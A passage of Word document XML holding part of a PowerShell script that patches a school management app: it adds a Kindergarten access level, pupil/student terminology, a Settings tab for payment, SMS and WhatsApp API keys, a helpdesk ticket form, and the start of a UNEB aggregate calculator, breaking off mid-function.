        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[8/15] Updating Access Control &amp; Terminology..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431925B0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $acPath = Join-Path $root "src\config\accessControl.js"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168A35CE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $acPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABA78A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $acPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765BE003">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "'Kindergarten'") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DF37712B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "'Nursery': \{", "'Kindergarten': { label: 'Kindergarten Only', modules: ['dashboard', 'students', 'attendance', 'nursery', 'ecd', 'finance', 'settings'], academicLevels: ['Kindergarten'], examTypes: [], showUNEB: false, showEMIS: false, showNursery: true, showSecondary: false, showExtracurricular: false },`n    'Nursery': {"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D7559">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9618A754">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "getTerminology") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF9E43">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $terminologyBlock = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DAAA51">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="EBB41028">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// Dynamic Terminology Helper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702C941">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>export function getTerminology(schoolLevel) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8FE1F9C9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    const isPrimaryLevel = ['Kindergarten', 'Nursery', 'Primary', 'Nursery_Primary'].includes(schoolLevel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EF4ABB14">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168AEAB2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        student: isPrimaryLevel ? 'Pupil' : 'Student',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B484C4D2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        students: isPrimaryLevel ? 'Pupils' : 'Students',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605409F0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        admission: isPrimaryLevel ? 'Pupil Admissions' : 'Student Admissions'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A311EA1C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E472142C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C8EC147E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CCC42901">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c + $terminologyBlock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B9A6D084">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6304D9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $acPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B1BF900A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E8BBF5B4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7D98FC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 9. UPGRADE SETTINGS.JSX ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B6C47674">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[9/15] Upgrading Settings (API Tab, Rollover, Helpdesk)..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FC0D11BC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $settingsPath = Join-Path $root "src\pages\Settings.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F34DE3EB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $settingsPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE0E57">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $settingsPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CE216895">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "const \[paySettings, setPaySettings\] = useState\(\{ \/\* no-op \*\/ \}\);", "const [paySettings, setPaySettings] = useState({ mtn_api_key: '', airtel_client_id: '', pesapal_key: '', pesapal_secret: '', at_username: '', at_api_key: '', wa_access_token: '', wa_phone_number_id: '' });"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF9E2C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "\['school', 'payments', 'location', 'leadership'\]", "['school', 'payments', 'apis', 'location', 'leadership']"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D8B00F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182D3BF1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $combinedUI = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B6155">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* ═══════════════════════════════════════════════════════ */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0315BC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* TAB: API CONFIGURATION */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8B260571">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* ═══════════════════════════════════════════════════════ */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EBAEACF1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {tab === 'apis' &amp;&amp; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC83A79">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B097E0DF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div className="card-header"&gt;🔌 Unified API Configuration (Per School)&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75F2A0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div className="card-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="91C79F1D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;p style={{ fontSize: '13px', color: '#666', marginBottom: '20px' }}&gt;Enter the API credentials for the services this school will use. These keys are stored securely in the local database.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19441699">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;h4 style={{ color: 'white', background: '#1a73e8', padding: '8px 12px', borderRadius: '6px' }}&gt;💳 Payment Gateways&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8A5D8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '15px', marginTop: '15px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8A6720CD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;PesaPal Consumer Key&lt;/label&gt;&lt;input className="form-input" value={paySettings.pesapal_key || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, pesapal_key: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B3D1B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;PesaPal Consumer Secret&lt;/label&gt;&lt;input type="password" className="form-input" value={paySettings.pesapal_secret || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, pesapal_secret: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D9B0DCDF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8C280B75">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;h4 style={{ color: 'white', background: '#0d904f', padding: '8px 12px', borderRadius: '6px', marginTop: '30px' }}&gt;📱 SMS Gateway (Africa's Talking)&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2131F379">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '15px', marginTop: '15px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B08756CB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;AT Username&lt;/label&gt;&lt;input className="form-input" placeholder="e.g., ssewasswa" value={paySettings.at_username || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, at_username: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFE5F8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;AT API Key&lt;/label&gt;&lt;input type="password" className="form-input" value={paySettings.at_api_key || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, at_api_key: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E2B8F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B8D7C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;h4 style={{ color: 'white', background: '#25D366', padding: '8px 12px', borderRadius: '6px', marginTop: '30px' }}&gt;🟢 WhatsApp Cloud API&lt;/h4&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B04D0EF9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '15px', marginTop: '15px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E79A514C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;WhatsApp Access Token&lt;/label&gt;&lt;input type="password" className="form-input" value={paySettings.wa_access_token || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, wa_access_token: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFCED4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;div className="form-group"&gt;&lt;label className="form-label"&gt;WhatsApp Phone Number ID&lt;/label&gt;&lt;input className="form-input" value={paySettings.wa_phone_number_id || ''} onChange={function (e) { setPaySettings(function (p) { return { ...p, wa_phone_number_id: e.target.value }; }); }} /&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="83F96B26">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BFEBE60E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;button onClick={handleSavePayments} className="btn btn-primary" style={{ marginTop: '25px' }} disabled={savingPayments}&gt;{savingPayments ? '⏳ Saving...' : '💾 Save All API Configurations'}&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FE2824D0">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F72D716">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113418F4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      )}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38780783">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B6144F9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* ─── Academic Year Rollover Engine ──────────────────────── */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8C4EA1D6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div className="card" style={{ marginTop: '20px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C06BDA38">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-header"&gt;📅 Academic Year Rollover&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C4A597BD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="84704064">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;p style={{ fontSize: '13px', color: '#666', marginBottom: '15px' }}&gt;Click this button at the end of the year to automatically promote all students to the next class, archive old marks, and reset fee balances.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A454534">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;button className="btn btn-primary" style={{ background: '#d32f2f' }} onClick={() =&gt; alert('Rollover Engine triggered. This would normally prompt for confirmation.')}&gt;🚀 Start New Academic Year&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="87F8BB2D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8DBB4EDE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E78F909">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C2FA3C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* ─── In-App Helpdesk ──────────────────────────────────── */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F307180">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div className="card" style={{ marginTop: '20px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="944D77A7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-header"&gt;🎧 Help &amp; Support&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF00A5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E031A2A3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;p style={{ fontSize: '13px', color: '#666', marginBottom: '15px' }}&gt;Experiencing a bug or need help? Send a ticket directly to Ssewasswa Comfort's Technologies.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C85745CB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;textarea className="form-input" rows="3" placeholder="Describe your issue here..." id="helpdesk-issue"&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9C97EE06">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;button className="btn btn-secondary" style={{ marginTop: '10px' }} onClick={async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AEA16D5B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            const issue = document.getElementById('helpdesk-issue').value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D2AC2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (!issue) return alert('Please describe your issue.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B332E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            const res = await window.electronAPI.submitHelpdeskTicket({ issue: issue, schoolId: 'Local School', username: 'Admin' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DB9718AA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (res.success) { alert('Ticket sent! We will contact you shortly.'); document.getElementById('helpdesk-issue').value = ''; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9110D2BE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            else { alert('Failed to send ticket. Check your internet.'); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B8289A49">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          }}&gt;Submit Ticket&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8AFB4A0A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1235A5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961EC87">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="E3C18241">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {/* ─── Gmail Backup ──────────────────────────────────────── */}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DDFFA7E2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A897D87">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $combinedUISafe = $combinedUI.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6DC3B2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = $c -replace "\{/\* ─── Gmail Backup ──────────────────────────────────────── \*/\}", $combinedUISafe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62483898">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $settingsPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BA6887C1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E7E8C18D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="A701A6E9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 10. UPGRADE BROADSHEET ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C5DDC44D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[10/15] Upgrading BroadSheet (UNEB Aggregates)..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242F9422">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $bsPath = Join-Path $root "src\pages\BroadSheet.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F0E3FA96">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>if (Test-Path $bsPath) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CE093">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    $c = Get-Content $bsPath -Raw -Encoding UTF8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F0C53">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ($c -notmatch "UNEB AGGREGATE CALCULATOR") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BBB90839">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $unebLogic = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17097181">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>// ═══ UNEB AGGREGATE CALCULATOR ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BC245388">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>function getUNEBAggregate(scores) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB9C2A5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const sorted = scores.filter(s =&gt; s !== null &amp;&amp; !isNaN(s)).sort((a, b) =&gt; a - b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79769448">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (sorted.length &lt; 8) return 'N/A';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CFBD4D1E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  const best8 = sorted.slice(0, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A1B64BDF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  let totalPoints = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2BD8F5">
      <w:pPr>
